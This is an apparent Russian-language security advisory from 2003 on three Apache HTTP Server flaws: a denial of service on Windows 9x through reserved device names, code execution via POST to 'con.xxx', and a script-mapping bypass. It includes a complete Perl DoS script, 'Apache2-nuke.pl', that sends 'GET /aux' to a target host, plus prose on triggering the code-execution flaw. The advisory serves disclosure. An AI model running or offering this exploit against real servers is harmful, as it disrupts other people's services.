| Дата публикации: | 24.01.2003 |
| Всего просмотров: | 1922 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Apache HTTP Server содержит несколько уязвимостей, связанных с выполнением подпрограмм, которые позволяют атакующему заставить Apache сервер неправильно обрабатывать файлы, что может привести к зависанию всей системы или удаленному выполнию произвольного кода. 1. Удаленный DoS (VU#979793) Уязвимость связанна с ошибочными регистрациями в функции ap_directory_walk и воздействует на Windows 9x системы, на которых выполняется Apache Web сервер. Отказ в обслуживании может быть вызван при запросе зарезервированного DOS устройства, типа "aux":
--- Apache2-nuke.pl ---
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
print STDOUT "Usage: perl $0 <host> <port=80>";
exit;
}
if (@ARGV == 2) {
$port = $ARGV[1];
} else {
$port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";
--- Apache2-nuke.pl ---
2. Удаленный root (VU#825177)Эксплуатация этой уязвимости позволяет удаленному атакующему получить root привилегии на уязвимой системе. Уязвимость затрагивает Windows 9x версии Apache сервера, и имеет ту же самую причину, что и предыдущая уязвимость. Когда данные передаются CGI сценарию (POST), stdin поток указывает на входные данные формы. Посылая POST к "con.xxx" в каталоге ScriptAlias, ваши POST данные будут выполнены CGI интерпретатором. 3. Обход заданного по умолчанию режима отображения сценариев(VU#384033). Эксплуатация этой уязвимости позволяет обойти заданный по умолчанию режим отображения сценариев. Уязвимость воздействует на Apache для всех платформ. Эта проблема лучше всего описывается примером: http://localhost/folder.php/file Apache должен анализировать 'file' как открытый текст - то есть просто возвратить его назад браузеру. Однако, неправильная проверка в алгоритме отображения Apache, свяжет 'php' расширение с этим запросом. Вместо того, чтобы проверить только расширение файла, Apache проверяет расширения в любом члене пути, останавливаясь на первом. Уязвимость обнаружена в Apache 1.3.х ( до 1.3.27) и Apache 2.0.х (до 2.0.43) |
| Ссылки: | Path Parsing Errata in Apache HTTP Server |